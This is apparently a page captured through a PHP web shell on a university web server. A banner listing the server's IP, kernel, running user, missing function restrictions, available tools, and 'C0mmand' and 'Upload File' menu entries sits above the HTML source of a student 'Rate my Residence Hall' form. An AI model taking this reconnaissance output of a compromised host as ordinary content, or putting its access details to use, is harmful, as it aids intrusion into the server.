Server IP : 172.16.15.8 / Your IP : 3.137.180.62 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/akshoop/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<html> <head> <style> body { font-family: "Apple Chancery", cursive; background-color: white; margin: 0; } ul { list-style-type: none; height: 100%; width: 250px; position: fixed; top: 0; left: 0; background-color: #555; overflow: auto; padding-top:20px; padding: 0; margin: 0; } li a { display: block; color: white; padding: 6px 8px 6px 16px; text-decoration: none; font-size: 20px; width: 100%; text-align: left; cursor: pointer; } li a.active { background-color: #81a4db; color: white; } li a:hover:not(.active) { background-color: #81a4db; color: white; } </style> </head> <body> <ul> <li><a href="projectIndex.html">Home</a></li> <li><a href="housingInformation.html">Information</a></li> <li><a class="active" href="rateMy.html">Rating Forms</a></li> <li><a href="rateMyTable.html">Tables</a></li> <li><a href="FAQs.html">FAQs</a></li> <li><a href="admin.html">Admin Login</a></li> </ul> <div style="margin-left:250px;padding:0px 10px;height:1000px;font-size: 20px;"> <h2>Rate my Residence Hall.</h2> <h3> <FORM action=rateMyResidenceHall2.php method=post> Select your Village: <select name=village> <OPTION>Bray Village (I)</OPTION> <OPTION>Allen Village (II)</OPTION> <OPTION>Brock Village (III)</OPTION> <OPTION>Honors Village (IV)</OPTION> <OPTION>Other</OPTION> </select> <BR> <INPUT type=submit value=Submit> <INPUT type=reset value=Reset> </FORM> </h3> </div> </body> </html>